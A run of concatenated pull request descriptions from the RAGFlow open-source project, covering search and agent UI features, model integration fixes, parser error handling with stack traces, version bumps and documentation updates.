### What problem does this PR solve?
Fix (next search): Optimize the search problem interface and related
functions #3221
-Add search_id to the retrievval_test interface
-Optimize handleSearchStrChange and handleSearch callbacks to determine
whether to enable AI search based on search configuration
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Reset all data except the first one on the chat page shared with
others #3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Fixed an issue where renaming a chat would create a new chat #3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Switch the root route to the new page #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix (search): Search application list supports renaming function #3221
-Update the search application list page and add a renaming operation
entry
-Modify the search application details interface to support obtaining
detailed information
-Optimize search settings page layout and style
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
- Update version tags in README files (including translations) from
v0.20.1 to v0.20.2
- Modify Docker image references and documentation to reflect new
version
- Update version badges and image descriptions
- Maintain consistency across all language variants of README files
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
Fix: Fixed the issue where clicking the SQL tool test button did not
request the interface #9541
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Refactor OpenAI to enable audio parsing.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] Refactoring
### What problem does this PR solve?
Allow Retrieval kb_ids param use kb_id,and allow list kb_name or kb_id。
- Add judgment on whether the knowledge base name is a list and support
batch queries
-When the knowledge base name does not exist, try using the ID for
querying
-If both query methods fail, throw an exception
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
Move stop_event.wait(6) into finally block so that even when an
exception occurs, the loop still sleeps before retrying. This prevents
busy looping and excessive error logs when Redis connection fails.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Allow agent operators to select speech-to-text models #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
feat(search): Optimized search functionality and user interface #3221
### Type of change
- Added similarity threshold adjustment function
- Optimized mind map display logic
- Adjusted search settings interface layout
- Fixed related search and document viewing functions
- Optimized time display and node selection logic
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
- Update search_app.py to use SearchService instead of
KnowledgebaseService for duplicate
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Displays the embedded page of the chat module #3221
Feat: Let the agen operator support the selection of tts model #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix Gemini parameters error.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Fix (search): Optimize the search page functionality and UI #3221
- Add a search list component
- Implement search settings
- Optimize search result display
- Add related search functionality
- Adjust the search input box style
- Unify internationalized text
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Add embedded search functionality.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
- Update httpx dependency to include socks support in pyproject.toml
- Update lockfile with new socksio dependency
### Type of change
- [x] Update dependencies for proxy support
### What problem does this PR solve?
Feat: Fixed the chat model setting echo issue
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
1. Use input length to prepare res
2. Adjust torch_empty_cache code location
### Type of change
- [x] Refactoring
- [x] Performance Improvement
### What problem does this PR solve?
There is a problem with the implementation of the Agent begin-form:
although the enablePrologue switch and the prologue input box are hidden
in Task mode, these values are still saved in the form data. If the user
first enables the opening and sets the content in Conversational mode,
and then switches to Task mode, these values will still be saved and may
be used in some scenarios.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
feat(search): Added app embedding functionality and optimized search
page #3221
- Added an Embed App button and related functionality
- Optimized the layout and interaction of the search settings interface
- Adjusted the search result display method
- Refactored some code to support new features
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Add SMTP support for user invitation emails
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Conversation completion can specify different model
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Add metadata configuration for new chats #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Handle unexpected truncated Excel files.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- Unified configuration format: All services now use the same image
configuration structure for consistency.
- Private registry support: Added imagePullSecrets to enable pulling
images from private registries.
- Per-service flexibility: Each service can override image-related
parameters independently.
### What problem does this PR solve?
_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
When calling HTTP to request data, if the JSON string returned by the
interface contains an unasked back slash like '\u', Python's RE module
will escape 'u' as Unicode, but there is no valid 4-digit hexadecimal
number at the end, so it will directly report an error. Error: re.
error: bad escape \ u at position 26
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Delete or filter conversations #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Upload files in the chat box #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
…e connecting line (#9226)
### What problem does this PR solve?
Can directly generate an agent node by dragging and dropping the
connecting line (#9226)
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
fix: preserve correct MIME & unify data URL handling for vision inputs
(relates #9248)
- Updated image2base64() to return a full data URL
(data:image/<fmt>;base64,...) with accurate MIME
- Removed hardcoded image/jpeg in Base._image_prompt(); pass through
data URLs and default raw base64 to image/png
- Set AnthropicCV._image_prompt() raw base64 media_type default to
image/png
- Ensures MIME type matches actual image content, fixing “cannot process
base64 image” errors on vLLM/OpenAI-compatible backends
### What problem does this PR solve?
This PR fixes a compatibility issue where base64-encoded images sent to
vision models (e.g., vLLM/OpenAI-compatible backends) were rejected due
to mismatched MIME type or incorrect decoding.
Previously, the backend:
- Always converted raw base64 into data:image/jpeg;base64,... even if
the actual content was PNG.
- In some cases, base64 decoding was attempted on the full data URL
string instead of the pure base64 part.
This caused errors like:
```
cannot process base64 image
failed to decode base64 string: illegal base64 data at input byte 0
```
by strict validators such as vLLM.
With this fix, the MIME type in the request now matches the actual image
content, and data URLs are correctly handled or passed through, ensuring
vision models can decode and process images reliably.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Send data to compare the performance of different models' answers
#3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Agent template: report agent using knowledge base
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
feat(next-search): Implements document preview functionality
- Adds a new document preview modal component
- Implements document preview page logic
- Adds document preview-related hooks
- Optimizes document preview rendering logic
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
KB folder may not there while creating virtual file. #9423
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Display a separate chat multi-model comparison page #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Make `session_id` optional and add `inputs` parameter
- Remove deprecated `sync_dsl` parameter
- Update request/response examples to match current API behavior
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
Update broken create agent session due to v0.20.0 changes. #9383
**NOTE: A session ID is no longer required to interact with the agent.**
See: #9241, #9309.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Show multiple chat boxes #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add `url`, `doc_type`, and `created_at` fields to the API response
example in the documentation.
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
Feat: Fixed the issue where some fields in the chat configuration could
not be displayed #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Allows set multiple types of default models in service config.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
- Add type and boundary checks for conv["reference"] access
- Prevent KeyError: 0 when reference list is empty or malformed
- Ensure reference is list type before indexing
- Handle cases where reference items are None or missing chunks
- Maintains backward compatibility with existing data structures
This resolves crashes in /api/v1/agents/<agent_id>/sessions endpoint
when conversation reference data is not properly structured.
### What problem does this PR solve?
This PR fixes a critical `KeyError: 0` that occurs in the
`/api/v1/agents/<agent_id>/sessions` endpoint when the system attempts
to access conversation reference data that is not properly structured.
**Background Context:**
The `list_agent_session` method in `api/apps/sdk/session.py` assumes
that `conv["reference"]` is always a properly indexed list with valid
dictionary structures. However, in real-world scenarios, this data can
be:
- Not a list type (could be None, string, or other types)
- An empty list when `chunk_num` tries to access index 0
- Contains None values or malformed dictionary structures
- Missing expected "chunks" keys in reference items
**Impact Before Fix:**
When malformed reference data is encountered, the API crashes with:
```json
{
"code": 100,
"data": null,
"message": "KeyError(0)"
}
```
**Solution:**
Added comprehensive safety checks including type validation, boundary
checking, null safety, and structure validation to ensure the API
gracefully handles all reference data formats while maintaining backward
compatibility.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Change return type of _generate_streamly from str to Generator[str,
None, None] to properly type hint streaming responses.
### Type of change
- [x] Refactoring
### What problem does this PR solve?
when begin component has optional file but not exist , it rase error
### Type of change
- [x] Bug Fix
Co-authored-by: Popmio <zhengyihao036@gamil.com>
### What problem does this PR solve?
Feat: Added meta data to the chat configuration page #8531
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
fix "File contains no valid workbook part"
stacktrace:
```
Traceback (most recent call last):
File "/ragflow/deepdoc/parser/excel_parser.py", line 54, in _load_excel_to_workbook
return RAGFlowExcelParser._dataframe_to_workbook(df)
File "/ragflow/deepdoc/parser/excel_parser.py", line 69, in _dataframe_to_workbook
ws.cell(row=row_num, column=col_num, value=value)
File "/ragflow/.venv/lib/python3.10/site-packages/openpyxl/worksheet/worksheet.py", line 246, in cell
cell.value = value
File "/ragflow/.venv/lib/python3.10/site-packages/openpyxl/cell/cell.py", line 218, in value
self._bind_value(value)
File "/ragflow/.venv/lib/python3.10/site-packages/openpyxl/cell/cell.py", line 197, in _bind_value
value = self.check_string(value)
File "/ragflow/.venv/lib/python3.10/site-packages/openpyxl/cell/cell.py", line 165, in check_string
raise IllegalCharacterError(f"{value} cannot be used in worksheets.")
```
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Before executing the SQL, remove tags in the format [ID: number] to
avoid execution errors.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: wangyazhou <wangyazhou@sdibd.cn>
### What problem does this PR solve?
add fallback to `calamine` engine when parse error raised using the
default `openpyxl` / `xlrd` engine.
e.g. the following error can be fixed:
```
Traceback (most recent call last):
File "/ragflow/deepdoc/parser/excel_parser.py", line 53, in _load_excel_to_workbook
df = pd.read_excel(file_like_object)
File "/ragflow/.venv/lib/python3.10/site-packages/pandas/io/excel/_base.py", line 495, in read_excel
io = ExcelFile(
File "/ragflow/.venv/lib/python3.10/site-packages/pandas/io/excel/_base.py", line 1567, in __init__
self._reader = self._engines[engine](
File "/ragflow/.venv/lib/python3.10/site-packages/pandas/io/excel/_xlrd.py", line 46, in __init__
super().__init__(
File "/ragflow/.venv/lib/python3.10/site-packages/pandas/io/excel/_base.py", line 573, in __init__
self.book = self.load_workbook(self.handles.handle, engine_kwargs)
File "/ragflow/.venv/lib/python3.10/site-packages/pandas/io/excel/_xlrd.py", line 63, in load_workbook
return open_workbook(file_contents=data, **engine_kwargs)
File "/ragflow/.venv/lib/python3.10/site-packages/xlrd/__init__.py", line 172, in open_workbook
bk = open_workbook_xls(
File "/ragflow/.venv/lib/python3.10/site-packages/xlrd/book.py", line 68, in open_workbook_xls
bk.biff2_8_load(
File "/ragflow/.venv/lib/python3.10/site-packages/xlrd/book.py", line 641, in biff2_8_load
cd.locate_named_stream(UNICODE_LITERAL(qname))
File "/ragflow/.venv/lib/python3.10/site-packages/xlrd/compdoc.py", line 398, in locate_named_stream
result = self._locate_stream(
File "/ragflow/.venv/lib/python3.10/site-packages/xlrd/compdoc.py", line 429, in _locate_stream
raise CompDocError("%s corruption: seen[%d] == %d" % (qname, s, self.seen[s]))
xlrd.compdoc.CompDocError: Workbook corruption: seen[2] == 4
```
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
https://github.com/infiniflow/ragflow/issues/9385
Based on my understanding, I think checking empty string is fine
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
feat(next-search): Added AI summary functionality #3221
- Added the LlmSettingFieldItems component for AI summary settings
- Updated the SearchSetting component to integrate AI summary
functionality
- Added the updateSearch hook and related service methods
- Modified the ISearchAppDetailProps interface to add the llm_setting
field
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
All models pass the mock response tests, which means that if a model can
return the correct response, everything should work as expected.
However, not all models have been fully tested in a real environment,
the real API_KEY. I suggest actively monitoring the refactored models
over the coming period to ensure they work correctly and fixing them
step by step, or waiting to merge until most have been tested in
practical environment.
### Type of change
- [x] Refactoring
### What problem does this PR solve?
- Fix error message assertion in test_update_chunk.py to match new
ownership validation
- Simplify dataset listing test cases by removing lambda assertions for
sorting
- Fix actions:
https://github.com/infiniflow/ragflow/actions/runs/16885465524/job/47831942553
### Type of change
- [x] Fix test cases
### What problem does this PR solve?
Python class Document was missing "meta_fields", e.g. when querying, the
document instances came without meta_fields
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Allow chat to use meta data #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Using the mcp server in n8n sometimes (with smaller models) results in
errors because the llm misses a char or adds one to the list of
dataset_ids provided. It first asks for the list of datasets and if you
got a larger list of them it makes a error recalling the list
completely. So adding the feature to just search through all available
datasets solves this and makes the retrieval of data more stable. The
functionality to just call special datasets by id is not changed, the
dataset_ids are now not required anymore (only the "question" is). You
can provide (like before) a list of datasets, a empty list or no list at
all.
### Type of change
- [X] New Feature (non-breaking change which adds functionality)
<img width="1897" height="880" alt="mcp error dataset id"
src="https://github.com/user-attachments/assets/71076d24-f875-4663-a69a-60839fc7a545"
/>
Fixes an issue where running the sandbox (code component) fails due to
unresolved hostnames. Added missing service names (es01, infinity,
mysql, minio, redis) to 127.0.0.1 in the /etc/hosts example.
Reference: https://github.com/infiniflow/ragflow/issues/8226
## What this PR does
Updates the sandbox quickstart documentation to fix a known issue where
the sandbox fails to resolve required service hostnames.
## Why
Following the original instruction leads to a `Failed to resolve 'none'`
error, as discussed in issue #8226. Adding the missing service names to
`127.0.0.1` resolves the problem.
## Related issue
https://github.com/infiniflow/ragflow/issues/8226
## Note
It might be better to add `127.0.0.1 es01 infinity mysql minio redis` to
docs/quickstart.mdx, but since no issues appeared at the time without
adding this line—and the problem occurred while working with the code
component—I added it here.
### Type of change
- [X] Documentation Update
- Root cause: accessing req.get("dataset_ids") returns None when the key
is absent, causing KeyError.
- Fix: use req.get("dataset_ids", []) to default to empty list.
### What problem does this PR solve?
- Modify error message assertion in chunk update test to check for
document ownership
- Add GraphRAG configuration with `use_graphrag: False` in dataset
update tests
- Fix actions:
https://github.com/infiniflow/ragflow/actions/runs/16863637898/job/47767511582
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
- The default dataset_ids "kb1" was removed from the Chat class.
- The HTTP API response does not include the dataset_ids field.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Add full list of supported AWS Bedrock regions.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
fix "no `tc` element at grid_offset", just log warning and ignore.
stacktrace:
```
Traceback (most recent call last):
File "/ragflow/rag/svr/task_executor.py", line 620, in handle_task
await do_handle_task(task)
File "/ragflow/rag/svr/task_executor.py", line 553, in do_handle_task
chunks = await build_chunks(task, progress_callback)
File "/ragflow/rag/svr/task_executor.py", line 257, in build_chunks
cks = await trio.to_thread.run_sync(lambda: chunker.chunk(task["name"], binary=binary, from_page=task["from_page"],
File "/ragflow/.venv/lib/python3.10/site-packages/trio/_threads.py", line 447, in to_thread_run_sync
return msg_from_thread.unwrap()
File "/ragflow/.venv/lib/python3.10/site-packages/outcome/_impl.py", line 213, in unwrap
raise captured_error
File "/ragflow/.venv/lib/python3.10/site-packages/trio/_threads.py", line 373, in do_release_then_return_result
return result.unwrap()
File "/ragflow/.venv/lib/python3.10/site-packages/outcome/_impl.py", line 213, in unwrap
raise captured_error
File "/ragflow/.venv/lib/python3.10/site-packages/trio/_threads.py", line 392, in worker_fn
ret = context.run(sync_fn, *args)
File "/ragflow/rag/svr/task_executor.py", line 257, in <lambda>
cks = await trio.to_thread.run_sync(lambda: chunker.chunk(task["name"], binary=binary, from_page=task["from_page"],
File "/ragflow/rag/app/naive.py", line 384, in chunk
sections, tables = Docx()(filename, binary)
File "/ragflow/rag/app/naive.py", line 230, in __call__
while i < len(r.cells):
File "/ragflow/.venv/lib/python3.10/site-packages/docx/table.py", line 438, in cells
return tuple(_iter_row_cells())
File "/ragflow/.venv/lib/python3.10/site-packages/docx/table.py", line 436, in _iter_row_cells
yield from iter_tc_cells(tc)
File "/ragflow/.venv/lib/python3.10/site-packages/docx/table.py", line 424, in iter_tc_cells
yield from iter_tc_cells(tc._tc_above) # pyright: ignore[reportPrivateUsage]
File "/ragflow/.venv/lib/python3.10/site-packages/docx/oxml/table.py", line 741, in _tc_above
return self._tr_above.tc_at_grid_offset(self.grid_offset)
File "/ragflow/.venv/lib/python3.10/site-packages/docx/oxml/table.py", line 98, in tc_at_grid_offset
raise ValueError(f"no `tc` element at grid_offset={grid_offset}")
ValueError: no `tc` element at grid_offset=10
```
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
fix "broken data stream when writing image file", just log warning and
ignore
Close#8379
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fixes the issue in the analyze_task execution flow where the Lead Agent
was not utilizing its own sys_prompt during task analysis, resulting in
incorrect or incomplete task planning.
https://github.com/infiniflow/ragflow/issues/9294
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- The enum import was changed from Python's built-in StrEnum to the
strenum package.
- Fix error `Warning: Failed to import module code_exec: cannot import
name 'StrEnum' from 'enum' (/usr/lib/python3.10/enum.py)`
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Run eslint when the project is running to standardize everyone's
code #9377
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
add ru
### What problem does this PR solve?
_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
Co-authored-by: Yingfeng <yingfeng.zhang@gmail.com>
### What problem does this PR solve?
Feat: Modify the agent list return field name #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: New search page components and features #3221
- Added search homepage, search settings, and ongoing search components
- Implemented features such as search app list, creating search apps,
and deleting search apps
- Optimized the multi-select component, adding disabled state and suffix
display
- Adjusted navigation hooks to support search page navigation
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Update version tags in README files (including translations) from
v0.20.0 to v0.20.1
- Modify Docker image references and documentation to reflect new
version
- Update version badges and image descriptions
- Maintain consistency across all language variants of README files
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
Revert token_required decorator of agent_bot completions and inputs.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] Refactoring
### What problem does this PR solve?
feat(agent): Adds prologue functionality #3221
- Add a prologue field to the IInputs type
- Initialize the prologue state in the chat container
- Use useEffect to monitor prologue changes and add prologue responses
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
new Agent templates: you can choose your knowledge base, providing
workflow and Agent versions
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Set the description of the agent, which can be null #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Render agent setting dialog #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Update broken agent completion due to v0.20.0 changes. #9199
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Contribute a new workflow template: SQL Assistant
### Type of change
- [x] Other (please describe): new workflow template
### What problem does this PR solve?
Feat: Restore the button's background color #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Replace color variables according to design draft #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Configure colors according to the design draft#3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix virtual file cannot be displayed in KB. #9265
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
fix: Optimized popups and the search page #3221
- Added a new PortalModal component
- Refactored the Modal component, adding show and hide methods to
support popups
- Updated the search page, adding a new query function and optimizing
the search card style
- Localized, added search-related translations
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Add missing env var `MYSQL_MAX_PACKET` to service_conf.yaml.template,
and add default values to opendal config to fix npe.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Updated constructors for base and derived classes in chat, embedding,
rerank, sequence2txt, and tts models to accept **kwargs. This change
improves extensibility and allows passing additional parameters without
breaking existing interfaces.
- [x] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: IT: Sop.Son <sop.son@feavn.local>
Co-authored-by: Copilot <175728472+Copilot@users.noreply.github.com>
### What problem does this PR solve?
Feat: Search conversation by name #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Create a conversation #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Improve the logic so that it does not decode base 64 for the test image
each time
### Type of change
- [x] Refactoring
- [x] Performance Improvement
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Add Claude Opus 4.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
- [x] Refactoring
FIX: If chunk["content_with_weight"] contains one or more unpaired
surrogate characters (such as incomplete emoji or other special
characters), then calling .encode("utf-8") directly will raise a
UnicodeEncodeError.
### What problem does this PR solve?
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
feat(agent): Added history management and paste handling features #3221
- Added a PasteHandlerPlugin to handle paste operations, optimizing the
multi-line text pasting experience
- Implemented the AgentHistoryManager class to manage history,
supporting undo and redo functionality
- Integrates history management functionality into the Agent component
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Implemented French UI translation
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
---------
Co-authored-by: ramin cedric <>
Co-authored-by: Liu An <asiro@qq.com>
### What problem does this PR solve?
Update readme
### Type of change
- [x] Documentation Update
---------
Signed-off-by: Jin Hai <haijin.chn@gmail.com>
### What problem does this PR solve?
Feat: Limit the appearance of loops in operators in the agent canvas
#3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
tiny fix about the using of `deepdoc.pdf_parser.PlainParser` in
`rag.app.presentation.chunk`, I referred to other ways of using this
class.
So tiny the fix is, a issue seems unnecessary.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Render dialog list #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
#9232
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
1. When creating a new session, initialize an empty reference that
includes both the app api and sdk API.
2. Fix the logic when retrieving references for historical messages: the
number of dialogue messages and reference messages may differ, but it
should match the number of assistant messages.
Co-authored-by: Li Ye <liye@unittec.com>
### What problem does this PR solve?
Fix: Fixed the issue where numbers could not be displayed in the numeric
input box under white theme #3221
Fix: Set the maximum number of rounds for the agent to 1 #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
This commit refactors the core prompts to decouple the high-level
reasoning from the low-level information extraction. By making
REASON_PROMPT a dedicated strategist that only generates search queries
and re-tasking RELEVANT_EXTRACTION_PROMPT to be a specialized tool for
single-fact extraction, we eliminate redundant information
summarization. This clear separation of concerns makes the overall
reasoning process significantly faster and more precise, as each
component now has a single, well-defined responsibility.
### Type of change
- [x] Performance Improvement
### What problem does this PR solve?
Fix: Add prompt text to the form in the MCP module #3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Fixed the issue where the agent's chat box could not automatically
scroll to the bottom #3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Fixed the loss of Await Response function on the share page and
other style issues #3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Fixed the issue where the prompt word edit box had no scroll bar
#3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
list_document supports range filtering.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
**Context and Purpose:**
This PR automatically remediates a security vulnerability:
- **Description:** h11: h11 accepts some malformed Chunked-Encoding
bodies
- **Rule ID:** CVE-2025-43859
- **Severity:** CRITICAL
- **File:** uv.lock
- **Lines Affected:** None - None
This change is necessary to protect the application from potential
security risks associated with this vulnerability.
**Solution Implemented:**
The automated remediation process has applied the necessary changes to
the affected code in `uv.lock` to resolve the identified issue.
Please review the changes to ensure they are correct and integrate as
expected.
### What problem does this PR solve?
Feat: New Agent startup parameters add knowledge base parameter #9194
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
fix "out of memory" if slide.get_thumbnail() to a huge image
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
…eType'"
### What problem does this PR solve?
fix "TypeError: '<' not supported between instances of 'Emu' and
'NoneType'"
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
fix#8424 NPE in dify_retrieval.py, add log exception
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix:
```bash
'Langfuse' object has no attribute 'trace'
```
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
https://github.com/infiniflow/ragflow/issues/9177
The reason should be due to the gemin internal use a different parameter
name
`
max_output_tokens (int):
Optional. The maximum number of tokens to include in a
response candidate.
Note: The default value varies by model, see the
``Model.output_token_limit`` attribute of the ``Model``
returned from the ``getModel`` function.
This field is a member of `oneof`_ ``_max_output_tokens``.
`
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
The index name of the tag chunks is generated by the tenant id of the
knowledge base, so it should use the tenant id instead of the current
user id in the listing tags API.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
This PR adds a data backup and migration solution for RAGFlow Docker
Compose deployments. Currently, users lack a standardized way to backup
and restore RAGFlow data volumes (MySQL, MinIO, Redis, Elasticsearch),
which is essential for data safety and environment migration.
**Solution:**
- **Migration Script** (`docker/migration.sh`) - Automates
backup/restore operations for all RAGFlow data volumes
- **Documentation**
(`docs/guides/migration/migrate_from_docker_compose.md`) - Usage guide
and best practices
- **Safety Features** - Container conflict detection and user
confirmations to prevent data loss
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
- [x] Documentation Update
Co-authored-by: treedy <treedy2022@icloud.com>
### What problem does this PR solve?
- Update version tags in README files (including translations) from
v0.19.1 to v0.20.0
- Modify Docker image references and documentation to reflect new
version
- Update version badges and image descriptions
- Maintain consistency across all language variants of README files
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
Feat: Adjust the style of the note node #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Fixed share-log UI issues and log-template bugs #3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Modify the style of the agent page bright theme #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add industry-related search keyword generation function
- When generating search keywords, support for specific industries has
been added
- If the "industry" parameter is provided, industry-specific
restrictions will be added to the prompt
- This change can help users generate more precise search keywords
within specific industries
### Type of change
